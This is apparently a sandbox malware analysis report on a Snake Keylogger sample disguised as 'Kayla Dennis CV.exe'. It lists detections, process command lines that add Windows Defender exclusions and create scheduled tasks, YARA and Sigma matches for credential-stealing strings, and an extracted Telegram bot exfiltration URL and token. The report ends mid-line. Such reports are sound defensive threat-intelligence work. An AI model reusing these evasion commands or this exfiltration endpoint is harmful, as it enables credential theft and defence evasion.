Edit tour

Windows Analysis Report
Kayla Dennis CV.exe

Overview

General Information

Sample name:	Kayla Dennis CV.exe
Analysis ID:	1557909
MD5:	8f6d690e119684b1629d41f97b83fb23
SHA1:	46efdb7ae7079a781723d75e390431aa4c6080e5
SHA256:	c997ad9cac5cb1cfc050a066e275aae6a540443075b2641ca19331b3f065ee29
Tags:	exeuser-abuse_ch
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected Snake Keylogger

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Kayla Dennis CV.exe (PID: 6300 cmdline: "C:\Users\user\Desktop\Kayla Dennis CV.exe" MD5: 8F6D690E119684B1629D41F97B83FB23)

powershell.exe (PID: 4688 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Kayla Dennis CV.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2820 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7516 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 7184 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp796.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 7344 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

RegSvcs.exe (PID: 7356 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

RegSvcs.exe (PID: 7364 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

lyKbfEsVYfQfU.exe (PID: 7428 cmdline: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe MD5: 8F6D690E119684B1629D41F97B83FB23)

schtasks.exe (PID: 7680 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp2EE5.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 7740 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7253575935:AAEoCGpTh1d2VtErBVh5tHQuO4O_SZJWbQk/sendMessage?chat_id=6246770128", "Token": "7253575935:AAEoCGpTh1d2VtErBVh5tHQuO4O_SZJWbQk", "Chat_id": "6246770128\n", "Version": "5.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.3288992952.00000000031A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000011.00000002.3289778566.0000000002C4F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14af3:$a1: get_encryptedPassword 0x14ddf:$a2: get_encryptedUsername 0x148ef:$a3: get_timePasswordChanged 0x149ea:$a4: get_passwordField 0x14b09:$a5: set_encryptedPassword 0x16187:$a7: get_logins 0x160ea:$a10: KeyLoggerEventArgs 0x15d55:$a11: KeyLoggerEventArgsEventHandler
0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19b3e:$x1: $%SMTPDV$ 0x1850c:$x2: $#TheHashHere%& 0x19ae6:$x3: %FTPDV$ 0x184ac:$x4: $%TelegramDv$ 0x15d55:$x5: KeyLoggerEventArgs 0x160ea:$x5: KeyLoggerEventArgs 0x19b0a:$m2: Clipboard Logs ID 0x19d48:$m2: Screenshot Logs ID 0x19e58:$m2: keystroke Logs ID 0x1a132:$m3: SnakePW 0x19d20:$m4: \SnakeKeylogger\
00000011.00000002.3289778566.0000000002A81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000B.00000002.3288992952.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x8b5cb:$a1: get_encryptedPassword 0xac3eb:$a1: get_encryptedPassword 0xcd00b:$a1: get_encryptedPassword 0x8b8b7:$a2: get_encryptedUsername 0xac6d7:$a2: get_encryptedUsername 0xcd2f7:$a2: get_encryptedUsername 0x8b3c7:$a3: get_timePasswordChanged 0xac1e7:$a3: get_timePasswordChanged 0xcce07:$a3: get_timePasswordChanged 0x8b4c2:$a4: get_passwordField 0xac2e2:$a4: get_passwordField 0xccf02:$a4: get_passwordField 0x8b5e1:$a5: set_encryptedPassword 0xac401:$a5: set_encryptedPassword 0xcd021:$a5: set_encryptedPassword 0x8cc5f:$a7: get_logins 0xada7f:$a7: get_logins 0xce69f:$a7: get_logins 0x8cbc2:$a10: KeyLoggerEventArgs 0xad9e2:$a10: KeyLoggerEventArgs 0xce602:$a10: KeyLoggerEventArgs
00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x90616:$x1: $%SMTPDV$ 0xb1436:$x1: $%SMTPDV$ 0xd2056:$x1: $%SMTPDV$ 0x8efe4:$x2: $#TheHashHere%& 0xafe04:$x2: $#TheHashHere%& 0xd0a24:$x2: $#TheHashHere%& 0x905be:$x3: %FTPDV$ 0xb13de:$x3: %FTPDV$ 0xd1ffe:$x3: %FTPDV$ 0x8ef84:$x4: $%TelegramDv$ 0xafda4:$x4: $%TelegramDv$ 0xd09c4:$x4: $%TelegramDv$ 0x8c82d:$x5: KeyLoggerEventArgs 0x8cbc2:$x5: KeyLoggerEventArgs 0xad64d:$x5: KeyLoggerEventArgs 0xad9e2:$x5: KeyLoggerEventArgs 0xce26d:$x5: KeyLoggerEventArgs 0xce602:$x5: KeyLoggerEventArgs 0x905e2:$m2: Clipboard Logs ID 0x90820:$m2: Screenshot Logs ID 0x90930:$m2: keystroke Logs ID
Process Memory Space: Kayla Dennis CV.exe PID: 6300	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Kayla Dennis CV.exe PID: 6300	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Kayla Dennis CV.exe PID: 6300	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: Kayla Dennis CV.exe PID: 6300	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x4e96a:$a1: get_encryptedPassword 0x4ec4c:$a2: get_encryptedUsername 0x4e770:$a3: get_timePasswordChanged 0x4e86b:$a4: get_passwordField 0x4e980:$a5: set_encryptedPassword 0x50e85:$a7: get_logins 0x50de8:$a10: KeyLoggerEventArgs 0x50a53:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: Kayla Dennis CV.exe PID: 6300	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x50a53:$x5: KeyLoggerEventArgs 0x50de8:$x5: KeyLoggerEventArgs 0x513be:$x5: KeyLoggerEventArgs 0x5171f:$x5: KeyLoggerEventArgs 0x53024:$m2: Clipboard Logs ID 0x5312a:$m2: Screenshot Logs ID 0x53180:$m2: keystroke Logs ID 0x532b5:$m3: SnakePW 0x53116:$m4: \SnakeKeylogger\
Process Memory Space: RegSvcs.exe PID: 7364	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7364	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: RegSvcs.exe PID: 7364	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x66910:$a1: get_encryptedPassword 0x66bf2:$a2: get_encryptedUsername 0x66716:$a3: get_timePasswordChanged 0x66811:$a4: get_passwordField 0x66926:$a5: set_encryptedPassword 0x68e2b:$a7: get_logins 0x68d8e:$a10: KeyLoggerEventArgs 0x689f9:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 7364	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x689f9:$x5: KeyLoggerEventArgs 0x68d8e:$x5: KeyLoggerEventArgs 0x69364:$x5: KeyLoggerEventArgs 0x696c5:$x5: KeyLoggerEventArgs 0x6afca:$m2: Clipboard Logs ID 0x6b0d0:$m2: Screenshot Logs ID 0x6b126:$m2: keystroke Logs ID 0x6b25b:$m3: SnakePW 0x6b0bc:$m4: \SnakeKeylogger\
Process Memory Space: lyKbfEsVYfQfU.exe PID: 7428	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegSvcs.exe PID: 7740	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7740	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
11.2.RegSvcs.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14cf3:$a1: get_encryptedPassword 0x14fdf:$a2: get_encryptedUsername 0x14aef:$a3: get_timePasswordChanged 0x14bea:$a4: get_passwordField 0x14d09:$a5: set_encryptedPassword 0x16387:$a7: get_logins 0x162ea:$a10: KeyLoggerEventArgs 0x15f55:$a11: KeyLoggerEventArgsEventHandler
11.2.RegSvcs.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c712:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b944:$a3: \Google\Chrome\User Data\Default\Login Data 0x1bd77:$a4: \Orbitum\User Data\Default\Login Data 0x1cdb6:$a5: \Kometa\User Data\Default\Login Data
11.2.RegSvcs.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x158db:$s1: UnHook 0x158e2:$s2: SetHook 0x158ea:$s3: CallNextHook 0x158f7:$s4: _hook
11.2.RegSvcs.exe.400000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19d3e:$x1: $%SMTPDV$ 0x1870c:$x2: $#TheHashHere%& 0x19ce6:$x3: %FTPDV$ 0x186ac:$x4: $%TelegramDv$ 0x15f55:$x5: KeyLoggerEventArgs 0x162ea:$x5: KeyLoggerEventArgs 0x19d0a:$m2: Clipboard Logs ID 0x19f48:$m2: Screenshot Logs ID 0x1a058:$m2: keystroke Logs ID 0x1a332:$m3: SnakePW 0x19f20:$m4: \SnakeKeylogger\
0.2.Kayla Dennis CV.exe.44978d8.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Kayla Dennis CV.exe.44978d8.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.Kayla Dennis CV.exe.44978d8.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12ef3:$a1: get_encryptedPassword 0x131df:$a2: get_encryptedUsername 0x12cef:$a3: get_timePasswordChanged 0x12dea:$a4: get_passwordField 0x12f09:$a5: set_encryptedPassword 0x14587:$a7: get_logins 0x144ea:$a10: KeyLoggerEventArgs 0x14155:$a11: KeyLoggerEventArgsEventHandler
0.2.Kayla Dennis CV.exe.44978d8.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a912:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19b44:$a3: \Google\Chrome\User Data\Default\Login Data 0x19f77:$a4: \Orbitum\User Data\Default\Login Data 0x1afb6:$a5: \Kometa\User Data\Default\Login Data
0.2.Kayla Dennis CV.exe.44978d8.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13adb:$s1: UnHook 0x13ae2:$s2: SetHook 0x13aea:$s3: CallNextHook 0x13af7:$s4: _hook
0.2.Kayla Dennis CV.exe.44978d8.1.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17f3e:$x1: $%SMTPDV$ 0x1690c:$x2: $#TheHashHere%& 0x17ee6:$x3: %FTPDV$ 0x168ac:$x4: $%TelegramDv$ 0x14155:$x5: KeyLoggerEventArgs 0x144ea:$x5: KeyLoggerEventArgs 0x17f0a:$m2: Clipboard Logs ID 0x18148:$m2: Screenshot Logs ID 0x18258:$m2: keystroke Logs ID 0x18532:$m3: SnakePW 0x18120:$m4: \SnakeKeylogger\
0.2.Kayla Dennis CV.exe.44b86f8.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Kayla Dennis CV.exe.44b86f8.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.Kayla Dennis CV.exe.44b86f8.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12ef3:$a1: get_encryptedPassword 0x131df:$a2: get_encryptedUsername 0x12cef:$a3: get_timePasswordChanged 0x12dea:$a4: get_passwordField 0x12f09:$a5: set_encryptedPassword 0x14587:$a7: get_logins 0x144ea:$a10: KeyLoggerEventArgs 0x14155:$a11: KeyLoggerEventArgsEventHandler
0.2.Kayla Dennis CV.exe.44b86f8.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a912:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19b44:$a3: \Google\Chrome\User Data\Default\Login Data 0x19f77:$a4: \Orbitum\User Data\Default\Login Data 0x1afb6:$a5: \Kometa\User Data\Default\Login Data
0.2.Kayla Dennis CV.exe.44b86f8.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13adb:$s1: UnHook 0x13ae2:$s2: SetHook 0x13aea:$s3: CallNextHook 0x13af7:$s4: _hook
0.2.Kayla Dennis CV.exe.44b86f8.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17f3e:$x1: $%SMTPDV$ 0x1690c:$x2: $#TheHashHere%& 0x17ee6:$x3: %FTPDV$ 0x168ac:$x4: $%TelegramDv$ 0x14155:$x5: KeyLoggerEventArgs 0x144ea:$x5: KeyLoggerEventArgs 0x17f0a:$m2: Clipboard Logs ID 0x18148:$m2: Screenshot Logs ID 0x18258:$m2: keystroke Logs ID 0x18532:$m3: SnakePW 0x18120:$m4: \SnakeKeylogger\
0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14cf3:$a1: get_encryptedPassword 0x35b13:$a1: get_encryptedPassword 0x56733:$a1: get_encryptedPassword 0x14fdf:$a2: get_encryptedUsername 0x35dff:$a2: get_encryptedUsername 0x56a1f:$a2: get_encryptedUsername 0x14aef:$a3: get_timePasswordChanged 0x3590f:$a3: get_timePasswordChanged 0x5652f:$a3: get_timePasswordChanged 0x14bea:$a4: get_passwordField 0x35a0a:$a4: get_passwordField 0x5662a:$a4: get_passwordField 0x14d09:$a5: set_encryptedPassword 0x35b29:$a5: set_encryptedPassword 0x56749:$a5: set_encryptedPassword 0x16387:$a7: get_logins 0x371a7:$a7: get_logins 0x57dc7:$a7: get_logins 0x162ea:$a10: KeyLoggerEventArgs 0x3710a:$a10: KeyLoggerEventArgs 0x57d2a:$a10: KeyLoggerEventArgs
0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x158db:$s1: UnHook 0x366fb:$s1: UnHook 0x5731b:$s1: UnHook 0x158e2:$s2: SetHook 0x36702:$s2: SetHook 0x57322:$s2: SetHook 0x158ea:$s3: CallNextHook 0x3670a:$s3: CallNextHook 0x5732a:$s3: CallNextHook 0x158f7:$s4: _hook 0x36717:$s4: _hook 0x57337:$s4: _hook
0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19d3e:$x1: $%SMTPDV$ 0x3ab5e:$x1: $%SMTPDV$ 0x5b77e:$x1: $%SMTPDV$ 0x1870c:$x2: $#TheHashHere%& 0x3952c:$x2: $#TheHashHere%& 0x5a14c:$x2: $#TheHashHere%& 0x19ce6:$x3: %FTPDV$ 0x3ab06:$x3: %FTPDV$ 0x5b726:$x3: %FTPDV$ 0x186ac:$x4: $%TelegramDv$ 0x394cc:$x4: $%TelegramDv$ 0x5a0ec:$x4: $%TelegramDv$ 0x15f55:$x5: KeyLoggerEventArgs 0x162ea:$x5: KeyLoggerEventArgs 0x36d75:$x5: KeyLoggerEventArgs 0x3710a:$x5: KeyLoggerEventArgs 0x57995:$x5: KeyLoggerEventArgs 0x57d2a:$x5: KeyLoggerEventArgs 0x19d0a:$m2: Clipboard Logs ID 0x19f48:$m2: Screenshot Logs ID 0x1a058:$m2: keystroke Logs ID
0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14cf3:$a1: get_encryptedPassword 0x35913:$a1: get_encryptedPassword 0x14fdf:$a2: get_encryptedUsername 0x35bff:$a2: get_encryptedUsername 0x14aef:$a3: get_timePasswordChanged 0x3570f:$a3: get_timePasswordChanged 0x14bea:$a4: get_passwordField 0x3580a:$a4: get_passwordField 0x14d09:$a5: set_encryptedPassword 0x35929:$a5: set_encryptedPassword 0x16387:$a7: get_logins 0x36fa7:$a7: get_logins 0x162ea:$a10: KeyLoggerEventArgs 0x36f0a:$a10: KeyLoggerEventArgs 0x15f55:$a11: KeyLoggerEventArgsEventHandler 0x36b75:$a11: KeyLoggerEventArgsEventHandler
0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x158db:$s1: UnHook 0x364fb:$s1: UnHook 0x158e2:$s2: SetHook 0x36502:$s2: SetHook 0x158ea:$s3: CallNextHook 0x3650a:$s3: CallNextHook 0x158f7:$s4: _hook 0x36517:$s4: _hook
0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19d3e:$x1: $%SMTPDV$ 0x3a95e:$x1: $%SMTPDV$ 0x1870c:$x2: $#TheHashHere%& 0x3932c:$x2: $#TheHashHere%& 0x19ce6:$x3: %FTPDV$ 0x3a906:$x3: %FTPDV$ 0x186ac:$x4: $%TelegramDv$ 0x392cc:$x4: $%TelegramDv$ 0x15f55:$x5: KeyLoggerEventArgs 0x162ea:$x5: KeyLoggerEventArgs 0x36b75:$x5: KeyLoggerEventArgs 0x36f0a:$x5: KeyLoggerEventArgs 0x19d0a:$m2: Clipboard Logs ID 0x19f48:$m2: Screenshot Logs ID 0x1a058:$m2: keystroke Logs ID 0x3a92a:$m2: Clipboard Logs ID 0x3ab68:$m2: Screenshot Logs ID 0x3ac78:$m2: keystroke Logs ID 0x1a332:$m3: SnakePW 0x3af52:$m3: SnakePW 0x19f20:$m4: \SnakeKeylogger\
Click to see the 26 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Kayla Dennis CV.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Kayla Dennis CV.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Kayla Dennis CV.exe", ParentImage: C:\Users\user\Desktop\Kayla Dennis CV.exe, ParentProcessId: 6300, ParentProcessName: Kayla Dennis CV.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Kayla Dennis CV.exe", ProcessId: 4688, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp2EE5.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp2EE5.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe, ParentImage: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe, ParentProcessId: 7428, ParentProcessName: lyKbfEsVYfQfU.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp2EE5.tmp", ProcessId: 7680, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp796.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp796.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Kayla Dennis CV.exe", ParentImage: C:\Users\user\Desktop\Kayla Dennis CV.exe, ParentProcessId: 6300, ParentProcessName: Kayla Dennis CV.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp796.tmp", ProcessId: 7184, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Kayla Dennis CV.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Kayla Dennis CV.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Kayla Dennis CV.exe", ParentImage: C:\Users\user\Desktop\Kayla Dennis CV.exe, ParentProcessId: 6300, ParentProcessName: Kayla Dennis CV.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 